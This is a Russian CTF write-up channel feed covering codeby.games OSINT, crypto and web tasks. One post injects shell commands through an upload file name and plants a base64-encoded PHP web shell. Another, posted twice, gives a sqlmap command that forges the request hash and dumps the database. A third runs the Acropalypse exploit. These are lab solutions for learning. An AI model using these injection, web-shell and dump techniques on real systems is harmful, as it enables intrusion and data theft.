Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
Друзья!

На сегодня наверное все. Завтра продолжим и выложим решения, которые нам уже скинули! Их много и они очень интересные!

Кидайте ваши решения, не стесняйтесь. Главное не решение, а подход к нему!

Всем хорошего отдыха, кибер-котлеты ❤️❤️❤️

с 8 утра по Москве начнем публиковать райтапы!
💊125💩2
Утро доброе, кибер-котлеты! Сегодня вас ждет множество райтапов и полезного контента, которые мы будем публиковать каждыве два часа!

Если у вас есть решение, пишите нам скорей @freenameruuuu и @coffeedipso и мы их обязательно опубликуем!
👍7🖕21
Осторожнее с доверием от @Vampir_Gosha

Известно, что сисадмин получил скриншот, который был обрезан (так как есть оригинал, на котором затерта информация).

На скриншоте видим, что ОС Windows, значит использовались Ножницы.

Путем недолгого поиска "ножницы windows vulnetrable" находим свежую CVE-2023-28303.

Путем еще одного простого поиска "cve-2023-28303 exploit" находим эксплойт на Github.
https://github.com/frankthetank-music/Acropalypse-Multi-Tool

Скаживаем репозиторий, импортируем недостающие библиотеки и запускаем эксплойт python ./gui.py

Далее выбираем RestoreTool, подгружаем обрезанный скриншот, указываем размеры, взяв их из большого изображения, и получаем обрезанную часть, где видим банковскую карту!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍101
😁8👎2🔥1
#OSINT Авиаперелет от @scars_on_the_hands

С помощью бота ищем все сайты для никнейма jamesonbondan.

Находим его страничку GitHub. (огого как не очевидно!)
Среди подписчиков пользователя находится funofacurichtasks
Если перейти в его репозиторий можно найти base64 сообщение.

Опять запускаем поиск. Ищем соцсеть, в которую обычно выкладывают фотки с путешествий. По нику и находим инстаграм профиль.
На страничке видим две фотографии.
Дата обеих фотографий - 19 января.

Картинка со столбом сделана в аэропорту Мадагаскара - Антананариву (сайт аэропорта находится по поиску фото).

Второе фото взято с сайта JetPhotos и дает нам информацию о компании авиаперевозчика -> Kenya Airways.
Найдем все вылеты из указанного аэропорта у данной комании!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤓51
Друзья! Кто решил ETL файлы? Не стесняемся, присылайте нам ваши решения! Главное подход к задаче, потому каждый из них уникален!

Для публикации райтапов пишите: @freenameruuuu и @coffeedipso
2
#Криптография Холмы от @andreika47

Дана матрица с номерами и строка с алфавитом

-------------------------
|76 |101|115|116|101|114|
-------------------------
|32 |83 |97 |110|100|101|
-------------------------
|114|115|32 |115|104|111|
-------------------------
|117|108|100|32 |104|101|
-------------------------
|108|112|32 |121|111|117|
-------------------------
|32 |58 |41 |41 |41 |42 |
-------------------------

KLZCOUKTVOUWUKDOBGZVJIIIRGVHXCRQUCNOX_IBBL

Пробуем декодировать матрицу в ascii. Получаем имя и фамилю криптографа, который знаменит шифром Хилла.

Гуглим , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.

Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица.

Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания.

Подобрав правильный алфавит (нам нужны буквы латиницы и символ _) получаем ответ!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3💊1
#WEB таск "Печенье" от @ErikPupOn:

Реализация через Python!

import requests
url = "http://62.173.140.174:46002/"
session = requests.Session()
cookies_data = {
"cookies": "[Sugar cookies, Oatmeal cookies, Crackers cookies]",
"amount": '[1, 5, 2]'
}
response = session.get(url, cookies=cookies_data)
print(response.text)
session.close()


🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬12🌚3
#OSINT от @scars_on_the_hands

В 1983 году в одной из стран произошел ужасный инцидент. Говорят, что известный актер был замешан в этом инциденте, но точную дату его рождения нам и предстоит узнать.


По вложенной фотографии с помощью Google Lens можно найти статью, в которой упоминается много раз страна Грузия.

По поиску в интернете 1983 Грузия ужасная катастрофа выдается случай с захватом самолета.

Воспользуемся помощью Chat GPT и попросим его выдать всех знаменитостей, вовлеченных в данный инцидент.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
#OSINT Перелёты от @Zer0_Tw0_02

~ По заданию говориться о каком-то произошедшем инциденте в 1983г и участвовавшем в нём актёре, дату рождения которого нам и предстоит узнать.

С помощью любой поисковой системы, либо Нейро от Яндекса ищем информацию по запросу "Мировые инциденты 1983г", и открыв Список террористических актов 1983 года можем найти Попытку угона Ту-134 в ноябре 1983 года, среди которых в числе причастных имеется нужное нам лицо. Остаётся лишь дело за малым - найти его дату рождения.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1
#OSINT Анимешник от @Zer0_Tw0_02

~ По заданию говориться о друге-анимешнике, который потерялся где-то на пару часов в аэропорту Токио 17 января 2024 на самолёте с бортовым номером серии XX-XXX

Первым делом ищем где взять архивные вылеты/прилеты аэропортов Токио и натыкаемся на сайт, на котором выбираем TOKYO NARITA INTERNATIONAL AIRPORT, после чего находим Список стран и их префиксов регистрации воздушных судов и перебираем по дате каждый подходящий рейс, чтобы изучить бортовые номера самолётов.
Либо выключаем мозг и читаем прям через слово, и сложив пазл воедино "Самолёт+Аниме" логически додумываем либо это Аниме-рейс, либо скин. Используя любой поисковик находим самолёты серии Pokemon Jet и там уже лежит заветный борт.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍121
Рекомендательный контент!
Фильм "Хакеры"

Команда университетских компьютерных гениев вступает в войну с сетевым злодеем
История про хакеров, которые случайно взламывают защиту корпорации «Эллингсон» и подключаются к схеме хищения средств, искусно замаскированной под компьютерный вирус.

https://www.afisha.ru/movie/hakery-165867/
👍7🔥2💔2
#WEB "Архиватор" от @IFed00
Открываем задание, видим одностраничник (index.php) который позволяет загружать файлы и выдаёт zip архив с ними. Имя архива рандомизируется, а сами архивы лежат в /upload/.

После изучения понимаем, что единственная ручка за которую можно дёргать - это имя посылаемого файла. Мой мощный тиммейт обнаружил, что имя используется в bash'e подменив его (с помощью burp proxi) на ; sleep 10; и получив соответствующую задержку.
Соответственно пытаемся передать для архивации какой-то более интересный путь ("/" если готовы качать потенциальные гигабайты в виде архивированной системы) и... архив не создаётся( Видимо внутренняя ошибка, о которой сайт нам не сообщает. Собственно решение на поверхности: $(pwd) а потом и $(cd .. && pwd) Warning: potential >10MB .zip

Таким образом получаем доступ к исходному коду index.php, который подтверждает все догадки: имя файла используется как часть команды bash. Однако перед этим сервер пытается переместить наш файл из временного хранилища со случайными именем в /uploads/*filename* и если имя содержит запрещённые символы (для имён файлов) выполнение прерывается. Самый интересный из запрещённых символов это конечно "/" который как раз позволил бы нам "походить" по системы и поискать флаг.

Отсюда решения могут быть разными, вот моё:
загрузим простенький бэкдор на php, который будет исполнять команду переданную через GET-запрос c параметром cmd в bash и выводить ответ:
<?php echo shell_exec($_GET('cmd') ?>
Чтобы не возиться с экранированием символов закодируем его в base64 и отправим на архивацию файл со следующим "именем":
$(cd .. && echo 'base64blob' | base64 --decode > backdoor.php)
Теперь в директории с правами выполнения у нас есть свой человечек...

Немного /backdoor.php?cmd=ls и в /var/www/ обнаруживаем flag.txt! Дальше cat /var/www/flag.txt и наконец rm backdoor.php

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
13👏2💊2🤯1
#OSINT Аниме-друг от @coffeedipso, @maoirt:

Находим сайт, который предоставляют информацию о самолетах, например -> (https://www.airliners.net/)

(The Best Airplane Information, Aviation Photos and Aviation News! 3,590,595 photos online!), вбиваем дату и место, там будет 2 страницы фотографий самолетов.

Ищем в стикерах аниме (почти последний, 2 страница), смотрим на номер!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1
Рекомендательный контент!
Вторжение. Краткая история русских хакеров

Летом 2016 года неизвестные выложили в интернет переписку высших чинов Демократической партии США — и российские хакеры, предположительно работающие на Кремль, моментально превратились в один из главных сюжетов мировой политики. Спецкор «Медузы», обладатель премии GQ в номинации «Журналист года» и четырех премий «Редколлегия» Даниил Туровский к тому времени писал об этих людях уже несколько лет: одни из них публиковали архивы почты российских чиновников, другие взламывали госсайты сопредельных стран по просьбе спецслужб, третьи просто зарабатывали миллионы, воруя их по всему миру.

«Вторжение» — самая полная история российских хакеров: от советских матшкол и постсоветской нищеты к мировой кибервойне и транснациональным преступным группировкам. Книга описывает новый тип власти — но, как показывает Туровский, люди, которые обладают этой властью, сталкиваются все с теми же моральными дилеммами, выбирая между тюрьмой и сумой, чувством и долгом, добром и злом.

Читать:https://bookmate.ru/books/zkRpzayD

Слушать: https://bookmate.ru/audiobooks/hlFogJtL
🔥5🖕3🤨2
#WEB Снитч от @freenameruuuu

Очень смешной таск. Первым делом пытался что-то сделать с JS, котроый отвечал за перемещение кнопки с целью, но потом глянув чуть ниже увидел в диве флаг. Такие дела)))

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
💊51😁1
#WEB Игровой автомат от @w0ltage

Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.

Предположительно, на бэкенде SQL запрос к БД вида SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLi

В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат

result=944&hash=6bed8834f12ba1043159b2cd5f846708


Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле

md5(sha256(sha1(sha256(sha1(result)))))


Зная это, дружим sqlmap с генерацией хэша через --eval и дампим БД

sqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all


*переменная result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"

Из БД вытаскиваем пароль от админа, логинимся и получаем флаг

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🖕3👍2
#OSINT Код Да Винчи от @Zer0_Tw0_02
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом

Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Завтра опубликуем решения по всему треку с #WEB
11
Друзья! Всем доброе утро.

Выкладываем ВСЕ по #WEB от @ishanyam

Ссылка на райтапы, которые прекрасно организованы в статьи

https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam

PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩8🤔3🔥1
Forwarded from Artyom
Игровой автомат

Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.

Предположительно, на бэкенде SQL запрос к БД вида SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLi

В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат

result=944&hash=6bed8834f12ba1043159b2cd5f846708


Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле

md5(sha256(sha1(sha256(sha1(result)))))


Зная это, дружим sqlmap с генерацией хэша через --eval и дампим БД

sqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all


*переменная result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"

Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
👍5😐21